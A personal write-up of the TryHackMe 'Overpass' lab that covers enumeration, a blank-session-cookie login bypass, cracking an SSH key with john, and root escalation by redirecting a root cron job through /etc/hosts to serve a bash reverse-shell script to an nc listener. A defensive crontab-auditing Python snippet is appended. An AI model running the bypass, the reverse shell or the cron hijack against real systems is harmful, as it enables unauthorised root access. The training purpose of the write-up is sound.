aldern00b

THM - Overpass - https://tryhackme.com/room/overpass#

Going into this, I'm still super new. I've got the knowledge of some basic tools but still need to look back at my notes to see how they're run - but let's give this one a shot as it's labeled as "easy".


I've found it's VERY important to write down what you do and what you get while doing this. The machine and the attack box are both timed and I've had multiple times where it just times out and I have to start over. Having information saved will make getting back quicker.

I didn't do an Nmap scan like I should have; instead I tested the IP for a website. Looks like there's a front end here for some software.



Next step, let's look at the source code for notes and stuff. Looks like we got some comments in there about "Romans used it". Sounds like they might be talking about some encryption types here.



Okay, well after some clicking around I didn't find much, other than some downloads. Let's try using GoBuster and see if I can find anything that might not be linked to.


Ohhh, what's this? An admin folder we haven't found yet! There are also some weird folders that all seem to start with http - perhaps backups? We can't visit them, so there's nothing to click and follow for me to view.



Ok, this is where I wasn't sure what to do. I played around with BurpSuite to mess around with those username/password fields looking for injection vulns. I decided to click the hint for the first part. The hint shows that we should be looking at the OWASP Top 10 list: https://owasp.org/Top10/



At this time, here's the list. I guess we just need to work down the list and see which one works. Broken Access Control felt like it should be what I should be looking at, but I wasn't sure where to go with it or how to use it.



Looking around the site a bit more and linking it with Broken Access Control, there is a JavaScript file that validates and sends information. I'm not really sure what to do with it but feel like I need to be providing information to this script to bypass something. I'll be honest, I was pretty stuck here - I don't really understand the code enough to know where or what to inject.


Using szymex's writeup for a hint, he suggested providing a blank session cookie:

Cookies.set("SessionToken", "")

When you do this it gives you a page for the very bottom else statement. You can provide this by using the "Console" section in the web tools and typing the above statement.



Doing this and then refreshing the page will give you a page where an admin is getting pretty frustrated with "James", so he's provided him his own RSA private key.



Well... let's set aside szymex for a second and see if we can move ahead with this without too much more help. My guess here is we need to crack this RSA key to get James' password for an SSH login to the server.


A quick Google search brought me here: https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/ which walks through a full tabletop walkthrough; skipping down, we see we're going to be using ssh2john. If you've followed the John The Ripper article I have, then you should have the jumbo version installed, which comes with this.


So I copied all the text to a file named "rsa" and used ssh2john to export that to a hash file.



Using john, we cracked the password.



Okay, so we got a password. I'm assuming "james" is the login ID but I don't know for sure. Still reading that page, we can pass the private key right to the SSH server! Let's try that.


ssh -i rsa james@10.10.89.112

We tried it out of the box and got an error; luckily that same page tells us what to do to fix this. We change the permissions on the file (I backed mine up before I made the change, just in case).


chmod 400 rsa
ssh -i rsa james@10.10.89.112

We provide that passphrase we cracked and bam! We're in!



Now we can list out the files and cat that user.txt to get the first flag.



There's also a todo.txt file that mentions the build scripts going somewhere but not being uploaded to the site.



Okay, now for escalation. I always have a problem with this but I have some notes to look at for some suggested options. I always like SUID permissions so we'll look for that.


Nothing turned up for SUID permissions at first glance. Poking through the system, though, I noticed there's a cron job that downloads the buildscript.sh file from the website and then pipes it to bash.


I wonder if there's a way to modify this file so it runs some of the AlderMagic I'd like to do... going through the file system though, I can't seem to dig up the webserver files. I'm unable to edit the crontab file either...



OK... well, we know it goes to a domain with a path for the script it wants, then pipes that to bash. What if we modified that domain to point to a different IP... say MY IP. Then we create a .sh file that launches an NC back to me. In theory, because the job runs as root, it should pop that NC shell as root.


Interestingly, I was not able to create an HTTP server on port 80 using the attack box or the attack Kali box, so I had to use my local Kali box to set up this web server. Before we do, we need to create the folder structure and the file it's trying to download. Because this is running as bash, I was able to find a reverse shell example here: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/


We're going to create the buildscript.sh file, and this will be its contents:

bash -i >& /dev/tcp/[localIP]/[localPort] 0>&1

Now we need to spin up our local HTTP server using Python:


python3 -m http.server 80 --bind [localIP]

Next we need to spin up a listener for the incoming connection this server is going to send us:


nc -lv -p [localPort] -s [localIP]

Finally, we need to make a change on the hacked box to update the hosts file so the domain points to this new server IP instead of localhost.



Once that's completed, we just need to wait for the cron job to execute and then we should be able to see the web request come in, followed by the fully functional shell.
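A defender-side check for the weakness this privilege escalation abuses, as an added example that is not part of the original writeup: it scans system-crontab lines (the /etc/crontab format with a user column) for jobs that pipe a downloaded script straight into a shell, and reports who runs them, whether the fetch is plaintext, and whether /etc/hosts overrides where the host name resolves. The crontab and hosts contents are constructed samples; build.internal is a placeholder host name.

```python
import re

# Constructed sample inputs (not taken from any real machine): a system crontab
# with one job that fetches a script over the network and pipes it into bash,
# and a hosts file that resolves that host name locally.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl build.internal/downloads/src/buildscript.sh | bash
0 3 * * * backup /usr/local/bin/backup.sh
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.0.1 build.internal
"""

# "<fetch tool> ... | [sudo] bash|sh": remote code executed by cron
FETCH_PIPE_RE = re.compile(
    r"\b(?:curl|wget)\b(?P<args>[^|]*)\|\s*(?:sudo\s+)?(?P<shell>bash|sh)\b")
URL_RE = re.compile(r"(?:(?P<scheme>https?)://)?(?P<host>[A-Za-z0-9.-]+)/\S*")


def parse_hosts(text):
    """Map every name in an /etc/hosts-style file to the IP it resolves to."""
    mapping = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        for name in parts[1:]:
            mapping[name] = parts[0]
    return mapping


def audit_crontab(crontab_text, hosts_text):
    """Return one finding per cron job that pipes a downloaded script into a shell."""
    hosts = parse_hosts(hosts_text)
    findings = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = FETCH_PIPE_RE.search(line)
        if not m:
            continue
        url = URL_RE.search(m.group("args"))
        host = url.group("host") if url else None
        fields = line.split()  # system crontab: 5 time fields, then the user
        findings.append({
            "line": line,
            "user": fields[5],
            "host": host,
            "plaintext": not (url and url.group("scheme") == "https"),  # no TLS: spoofable
            "hosts_override": hosts.get(host),  # local entry redirects the fetch
            "shell": m.group("shell"),
        })
    return findings
```

A job flagged as root-run, plaintext and resolved through /etc/hosts is exactly the combination the walkthrough above relies on; fixing any one of the three (pin the script locally, fetch over HTTPS with certificate checks, or remove the hosts override) breaks the chain.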






